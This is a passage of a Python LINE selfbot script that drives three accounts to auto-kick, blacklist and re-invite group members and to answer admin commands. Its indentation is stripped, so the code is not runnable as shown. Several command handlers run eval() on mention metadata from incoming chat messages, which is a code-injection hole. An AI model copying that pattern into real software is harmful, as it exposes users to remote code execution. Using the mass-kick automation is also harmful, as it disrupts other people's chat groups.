d23X_42 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 19 or op.type == 133:
if op.type == 19: print ("[ 19 ] NOTIFIED KICKOUT FROM GROUP")
else: print ("[ 133 ] NOTIFIED DELETE OTHER FROM CHAT")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck6 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_43 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_44 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_45 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 in M001D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_46 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_47 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_48 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
d23X_49 = threading.Thread(target=antijs, args=(op.param1, op.param2)).start()
d23X_50 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in M002D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_51 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_52 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_53 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
d23X_54 = threading.Thread(target=antijs, args=(op.param1, op.param2)).start()
d23X_55 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param3 in M003D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_56 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_57 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_58 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
d23X_59 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 32 or op.type == 126:
if op.type == 32: print ("[ 32 ] NOTIFIED CANCEL INVITATION GROUP")
else: print ("[ 126 ] NOTIFIED CANCEL CHAT INVITATION")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck7 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.param1 in status["promax"]:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_60 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_61 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_62 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M001D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_63 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_64 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_65 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M002D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_66 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_67 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_68 = threading.Thread(target=backup, args=(op.param1, op.param3)).start()
except:
pass
if op.param3 == M003D23:
if op.param2 in creator or op.param2 in owner or op.param2 in admin or op.param2 in staff or op.param2 in Bots or op.param2 in mybots:
pass
else:
d23X_69 = threading.Thread(target=blacklist, args=(op.param2,)).start()
try:
d23X_70 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
d23X_71 = threading.Thread(target=invite, args=(op.param1, op.param3)).start()
except:
pass
if op.type == 55:
print ("[ 55 ] NOTIFIED READ MESSAGE")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck8 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 25 or op.type == 26:
# if op.type == 25: print ("[ 25 ] SEND MESSAGE")
# else: print ("[ 26 ] RECEIVE MESSAGE")
if settings["autoPurge"] == True:
if op.param2 in status["blacklist"]:
try:
fck9 = threading.Thread(target=kick, args=(op.param1, op.param2)).start()
except:
pass
if op.type == 22 or op.type == 24:
if op.type == 22: print ("[ 22 ] NOTIFIED INVITE INTO ROOM")
else: print ("[ 24 ] NOTIFIED LEAVE ROOM")
try:
a001.leaveRoom(op.param1)
except:
try:
a002.leaveRoom(op.param1)
except:
try:
a003.leaveRoom(op.param1)
except:
pass
if op.type == 25 or op.type == 26:
if op.type == 25: print ("[ 25 ] SEND MESSAGE")
else: print ("[ 26 ] RECEIVE MESSAGE")
global cmd
global text
global groupParam
msg = op.message
text = msg.text
reply = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 1 or msg.toType == 2:
if msg.toType == 0:
if sender != a001.profile.mid:
to = sender
else:
to = receiver
if msg.toType == 1:
to = receiver
if msg.toType == 2:
to = receiver
if msg.contentType == 1:
if sender in creator or sender in owner:
if M001D23 in settings["updatePict"]:
path = a001.downloadObjectMsg(msg.id)
del settings["updatePict"][M001D23]
a001.updateProfilePicture(path)
a001.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if M002D23 in settings["updatePict"]:
path = a002.downloadObjectMsg(msg.id)
del settings["updatePict"][M002D23]
a002.updateProfilePicture(path)
a002.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if M003D23 in settings["updatePict"]:
path = a003.downloadObjectMsg(msg.id)
del settings["updatePict"][M003D23]
a003.updateProfilePicture(path)
a003.sendReplyMessage(reply,receiver,"[ Profile Picture ]\nSuccess Change Profile Picture")
if msg.contentType == 13:
if settings["addowner"] == True:
if sender in creator:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["owner"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Owner Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addowner"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["owner"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Owner".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addowner"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addowner"] = False
if settings["delowner"] == True:
if sender in creator:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["owner"]:
status["owner"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Owner".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delowner"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Owner Access")
settings["delowner"] = False
if settings["addadmin"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["admin"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Admin Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addadmin"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["admin"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Admin".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addadmin"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addadmin"] = False
if settings["deladmin"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["admin"]:
status["admin"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Admin".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["deladmin"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Admin Access")
settings["deladmin"] = False
if settings["addstaff"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["staff"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Staff Access".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addstaff"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["staff"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Recruit To Staff".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addstaff"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addstaff"] = False
if settings["delstaff"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["staff"]:
status["staff"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Expel From Staff".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delstaff"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Staff Access")
settings["delstaff"] = False
if settings["addbots"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["mybots"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Squad List".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addbots"] = False
else:
if msg.contentMetadata["mid"] not in status["blacklist"]:
status["mybots"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Add To Squad".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addbots"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser In Blacklist")
settings["addbots"] = False
if settings["delbots"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["mybots"]:
status["mybots"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Delete From Squad".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delbots"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Squad List")
settings["delbots"] = False
if settings["addban"] == True:
if sender in creator or sender in owner:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["blacklist"]:
a001.sendReplyMessage(reply,receiver,"{} Already In Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addban"] = False
else:
status["blacklist"].append(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Add To Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["addban"] = False
if settings["delban"] == True:
if sender in creator or sender in owner or sender in admin:
if msg.contentMetadata["mid"] not in Bots:
if msg.contentMetadata["mid"] in status["blacklist"]:
status["blacklist"].remove(msg.contentMetadata["mid"])
a001.sendReplyMessage(reply,receiver,"{} Delete From Blacklist".format(a001.getContact(msg.contentMetadata["mid"]).displayName))
settings["delban"] = False
else:
a001.sendReplyMessage(reply,receiver,"[ Failed ]\nUser Not In Blacklist")
settings["delban"] = False
if msg.contentType == 0:
if text is None:
return
else:
hellterhead = command(text)
hlth = " ".join(hellterhead.split())
for hlth in hellterhead.split(' & '):
if hlth == "help":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(helpCmd))
elif hlth == "protection":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(proCmd))
elif hlth == "group":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(groupCmd))
elif hlth == "access":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(accessCmd))
elif hlth == "option":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(optCmd))
elif hlth == "settings":
if sender in creator or sender in owner or sender in admin or sender in staff:
sendFooter(receiver,str(setCmd))
elif hlth.startswith("allowliff"):
if sender in creator or sender in owner or sender in admin or sender in staff:
try:
allowLiff()
a001.sendReplyMessage(reply,receiver,"Flex Mode Enable")
except:
a001.sendMessage(receiver,"line://app/1602687308-GXq4Vvk9/?type=text&text=セルボットDRE!")
elif hlth == "mention" or hlth == "tagall":
group = a001.getGroup(receiver)
memb = [contact.mid for contact in group.members]
a001.datamention(receiver,"{}".format(group.name),memb)
elif hlth == "reboot":
if sender in creator or sender in owner:
a001.sendMessage(receiver,"[ Rebooting... ]")
settings["restartPoint"] = receiver
restartProgram()
elif hlth == "shutdown":
if sender in creator or sender in owner:
a001.sendMessage(receiver,"[ Turn Off Program ]")
sys.exit('\n》》》》PROGRAM TERMINATED《《《《\n')
elif hlth == "clearchat":
if sender in creator or sender in owner or sender in admin:
for x in Botslist:
x.removeAllMessages(op.param2)
for z in Botslist:
z.sendReplyMessage(reply,receiver,"[ All Chat Cleared ]")
elif hlth == "creator":
sendFooter(receiver,str(dreX53))
elif hlth == "about":
sendFooter(receiver,str(aboutCmd))
elif hlth == "me":
contact = a001.getContact(sender)
a001.sendContact(receiver, contact.mid)
elif hlth == "mid":
contact = a001.getContact(sender)
a001.sendReplyMessage(reply,receiver, "{}".format(contact.mid))
elif hlth.startswith("mid "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
mcont = ""
for ls in lists:
mcont += "{}".format(str(ls))
a001.sendReplyMessage(reply,receiver,str(mcont))
elif hlth.startswith("contact "):
if 'MENTION' in msg.contentMetadata.keys()!= None:
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention["M"] not in lists:
lists.append(mention["M"])
for ls in lists:
contact = a001.getContact(ls)
cont = contact.mid
a001.sendContact(receiver, cont)
elif hlth == "ping":
a001.sendMessage(receiver,"1")
a002.sendMessage(receiver,"2")
a003.sendMessage(receiver,"3")
elif hlth == "respon":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,"[ {} ]".format(resp1))
a002.sendReplyMessage(reply,receiver,"[ {} ]".format(resp2))
a003.sendReplyMessage(reply,receiver,"[ {} ]".format(resp3))
elif hlth == "speed":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,logspeed())
a002.sendReplyMessage(reply,receiver,logspeed())
a003.sendReplyMessage(reply,receiver,logspeed())
elif hlth == "debug":
if sender in creator or sender in owner or sender in admin or sender in staff:
a001.sendReplyMessage(reply,receiver,debug())
a002.sendReplyMessage(reply,receiver,debug())
a003.sendReplyMessage(reply,receiver,debug())
elif hlth == "ginfo":
if sender in creator or sender in owner or sender in admin or sender in staff:
group = a001.getGroup(receiver)
try:
gCreator = group.creator.displayName
except:
gCreator = "Not Found"
if group.invitee is None:
gPending = "0"
else:
gPending = str(len(group.invitee))
if group.preventedJoinByTicket == True:
gQr = "Clossed"
gTicket = "Nothing"
else:
gQr = "Opened"
gTicket = "https://line.me/R/ti/g/{}".format(str(a001.reissueGroupTicket(group.id)))
hlthX = "[ Group Info ]"
hlthX += "\n- Group Name: {}".format(str(group.name))
hlthX += "\n- Group ID: {}".format(group.id)
hlthX += "\n- Creator: {}".format(str(gCreator))
hlthX += "\n- Member: {}".format(str(len(group.members)))
hlthX += "\n- Pending: {}".format(gPending)
hlthX += "\n- Group URL: {}".format(gQr)
hlthX += "\n- Group Ticket: {}".format(gTicket)
a001.sendReplyMessage(reply,receiver,hlthX)
elif hlth == "openqr":
if sender in creator or sender in owner or sender in admin:
group = a001.getGroup(receiver)
group.preventedJoinByTicket = False
a001.updateGroup(group)
gurl = a001.reissueGroupTicket(receiver)
a001.sendReplyMessage(reply,receiver,"QR Group Opened")
a001.sendReplyMessage(reply,receiver,"line://ti/g/" + gurl)
elif hlth == "closeqr":
if sender in creator or sender in owner or sender in admin:
group = a001.getGroup(receiver)
group.preventedJoinByTicket = True
a001.updateGroup(group)
a001.sendReplyMessage(reply,receiver,"QR Group Closed")
elif hlth == "leave":
if sender in creator or sender in owner or sender in admin:
for bot in Botslist:
bot.leaveGroup(receiver)
elif hlth.startswith("leave "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("leave ","")
if spl == "1":
a001.leaveGroup(receiver)
if spl == "2":
a002.leaveGroup(receiver)
if spl == "3":
a003.leaveGroup(receiver)
elif hlth == "join":
if sender in creator or sender in owner or sender in admin:
G = a001.getGroup(receiver)
G.preventedJoinByTicket = False
a001.updateGroup(G)
links = a001.reissueGroupTicket(receiver)
a002.acceptGroupInvitationByTicket(receiver,links)
a003.acceptGroupInvitationByTicket(receiver,links)
G = a001.getGroup(receiver)
G.preventedJoinByTicket = True
a001.updateGroup(G)
elif hlth == "blacklist" or hlth == "banlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
if len(status["blacklist"]) > 0:
h = [a for a in status["blacklist"]]
k = len(h)//20
for aa in range(k+1):
if aa == 0:dd = '┏━ Blacklist User';no=aa
else:dd = '';no=aa*20
msgas = dd
for a in h[aa*20:(aa+1)*20]:
no+=1
if no == len(h):
msgas+='\n┣ {}. @!'.format(no)
else:
msgas += '\n┣ {}. @!'.format(no)
msgas += '\n┗━━━━'
sendMention(to, msgas, h[aa*20:(aa+1)*20])
else:
a001.sendReplyMessage(reply,receiver,"[ Doesn't Have Any Blacklist User ]")
elif hlth == "clearban":
if sender in creator or sender in owner or sender in admin:
if len(status["blacklist"]) > 0:
a001.sendReplyMessage(reply,receiver, "[ {} User Cleared ]".format(len(status["blacklist"])))
status["blacklist"].clear()
else:
a001.sendReplyMessage(reply,receiver,"[ Doesn't Have Any Blacklist User ]")
elif hlth == "squad list":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
a = 0
for ls in mybots:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(reply,receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Bots\n"+ma+"┗━ Total [ %s ] Bots" %(str(len(mybots))))
elif hlth == "view bots":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
a = 0
for ls in Bots:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(reply,receiver, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Bots\n"+ma+"┗━ Total [ %s ] Bots" %(str(len(Bots))))
elif hlth == "view access":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
mb = ""
mc = ""
md = ""
a = 0
b = 0
c = 0
d = 0
for ls in creator:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getContact(ls).displayName + "\n"
for ls in owner:
b = b + 1
end = '\n'
mb += '┣ ' + str(b) + ". " +a001.getContact(ls).displayName + "\n"
for ls in admin:
c = c + 1
end = '\n'
mc += '┣ ' + str(c) + ". " +a001.getContact(ls).displayName + "\n"
for ls in staff:
d = d + 1
end = '\n'
md += '┣ ' + str(d) + ". " +a001.getContact(ls).displayName + "\n"
a001.sendReplyMessage(msg.id, to, "┏━ 𐀀 HΞLLTΞRHΞΛD ᴄᴏʀᴘ.\n┣━━━━ List Access\n┣━━━━ Creator\n"+ma+"┣━━━━ Owner\n"+mb+"┣━━━━ Admin\n"+mc+"┣━━━━ Staff\n"+md+"┗━ Total [ %s ] Access" %(str(len(creator)+len(owner)+len(admin)+len(staff))))
elif hlth.startswith("add owner"):
if sender in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["owner"].append(target)
sendMention(to,"[ Add Owner ]\nUser @! Added To Owner Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Owner ]\nCreator Permission")
elif hlth.startswith("del owner"):
if sender in creator:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["owner"].remove(target)
sendMention(to,"[ Delete Owner ]\nUser @! Deleted From Owner Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Owner ]\nCreator Permission")
elif hlth.startswith("add admin"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["admin"].append(target)
sendMention(to,"[ Add Admin ]\nUser @! Added To Admin Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Admin ]\nOwner Permission")
elif hlth.startswith("del admin"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["admin"].remove(target)
sendMention(to,"[ Delete Admin ]\nUser @! Deleted From Admin Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Admin ]\nOwner Permission")
elif hlth.startswith("add staff"):
if sender in creator or sender in owner or sender in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["staff"].append(target)
sendMention(to,"[ Add Staff ]\nUser @! Added To Staff Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Staff ]\nOwner/Admin Permission")
elif hlth.startswith("del staff"):
if sender in creator or sender in owner or sender in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["staff"].remove(target)
sendMention(to,"[ Delete Staff ]\nUser @! Deleted From Staff Access",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Staff ]\nOwner/Admin Permission")
elif hlth.startswith("add squad"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for xbot in Botslist:
for xtarg in targets:
try:
xbot.findAndAddContactsByMid(xtarg)
except:
pass
for target in targets:
try:
status["mybots"].append(target)
sendMention(to,"[ Add Squad ]\nUser @! Added To Squad List",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Squad ]\nOwner Permission")
elif hlth.startswith("del squad"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["mybots"].remove(target)
sendMention(to,"[ Delete Squad ]\nUser @! Deleted From Squad List",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Squad ]\nOwner Permission")
elif hlth.startswith("add ban"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["blacklist"].append(target)
sendMention(to,"[ Add Blacklist ]\nUser @! Added To Blacklist User",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Add Blacklist ]\nOwner Permission")
elif hlth.startswith("del ban"):
if sender in creator or sender in owner:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
status["blacklist"].remove(target)
sendMention(to,"[ Delete Blacklist ]\nUser @! Deleted From Blacklist User",[target])
except:
pass
else:
a001.sendReplyMessage(reply,receiver,"[ Delete Blacklist ]\nOwner Permission")
elif hlth.startswith("owner:"):
if sender in creator:
spl = hlth.replace("owner:","")
if spl == "recruit":
settings["addowner"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Owner ]\nPlease Send Contact To Add")
if spl == "expel":
settings["delowner"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Owner ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nCreator Permission")
elif hlth.startswith("admin:"):
if sender in creator or sender in owner:
spl = hlth.replace("admin:","")
if spl == "recruit":
settings["addadmin"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Admin ]\nPlease Send Contact To Add")
if spl == "expel":
settings["deladmin"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Admin ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth.startswith("staff:"):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("staff:","")
if spl == "recruit":
settings["addstaff"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Staff ]\nPlease Send Contact To Add")
if spl == "expel":
settings["delstaff"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Staff ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nAdmin Permission")
elif hlth.startswith("squad:"):
if sender in creator or sender in owner:
spl = hlth.replace("squad:","")
if spl == "add":
settings["addbots"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Squad ]\nPlease Send Contact To Add")
if spl == "del":
settings["delbots"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Squad ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth.startswith("ban:"):
if sender in creator or sender in owner:
spl = hlth.replace("ban:","")
if spl == "add":
settings["addban"] = True
a001.sendReplyMessage(reply,receiver,"[ Add Blacklist ]\nPlease Send Contact To Add")
if spl == "del":
settings["delban"] = True
a001.sendReplyMessage(reply,receiver,"[ Delete Blacklist ]\nPlease Send Contact To Delete")
else:
a001.sendReplyMessage(reply,receiver,"[ Access Denied ]\nOwner Permission")
elif hlth == "abort" or hlth == "eject":
if sender in creator:
settings["addadmin"] = False
settings["addban"] = False
settings["addbots"] = False
settings["addowner"] = False
settings["addstaff"] = False
settings["deladmin"] = False
settings["delban"] = False
settings["delbots"] = False
settings["delowner"] = False
settings["delstaff"] = False
a001.sendReplyMessage(reply,receiver,"Command Aborted")
elif hlth.startswith("grouplist "):
if sender in creator or sender in owner or sender in admin:
spl = hlth.replace("grouplist ","")
if spl == "1":
group = a001.getGroupIdsJoined()
getg = a001.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp1)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a001.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
if spl == "2":
group = a002.getGroupIdsJoined()
getg = a002.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp2)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a002.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
if spl == "3":
group = a003.getGroupIdsJoined()
getg = a003.getGroups(group)
num = 1
msgs = "┏━ Group List"
msgs += "\n┣━━━━ {}".format(resp3)
for ids in getg:
msgs += "\n┣ %i. %s" % (num, ids.name) + " (" + str(len(ids.members)) + ")"
num = (num+1)
msgs += "\n┗━ Total [ %i ] Group" % len(getg)
a003.sendReplyMessage(reply,receiver,"{}".format(str(msgs)))
elif hlth == "memberlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
getg = a001.getGroup(receiver)
no = 1
ret = "┏━ Member List\n┣━━━━ {}".format(getg.name)
if getg.members is None:
a001.sendReplyMessage(reply,receiver,"Not Found")
else:
for i in getg.members:
ret += "\n┣ {}. {}".format(no,a001.getContact(i.mid).displayName)
no = (no+1)
ret += "\n┗━ Total [ %i ] Member" % len(getg.members)
a001.sendReplyMessage(reply,receiver,ret)
elif hlth == "pendinglist":
if sender in creator or sender in owner or sender in admin or sender in staff:
getg = a001.getGroup(receiver)
no = 1
ret = "┏━ Pending List\n┣━━━━ {}".format(getg.name)
if getg.invitee is None:
a001.sendReplyMessage(reply,receiver,"Not Found")
else:
for i in getg.invitee:
ret += "\n┣ {}. {}".format(no,a001.getContact(i.mid).displayName)
no = (no+1)
ret += "\n┗━ Total [ %i ] Pending" % len(getg.invitee)
a001.sendReplyMessage(reply,receiver,ret)
elif hlth == "protectlist":
if sender in creator or sender in owner or sender in admin or sender in staff:
ma = ""
mb = ""
a = 0
b = 0
for ls in promax:
a = a + 1
end = '\n'
ma += '┣ ' + str(a) + ". " +a001.getGroup(ls).name + "\n"
for ls in strictmode:
b = b + 1
end = '\n'
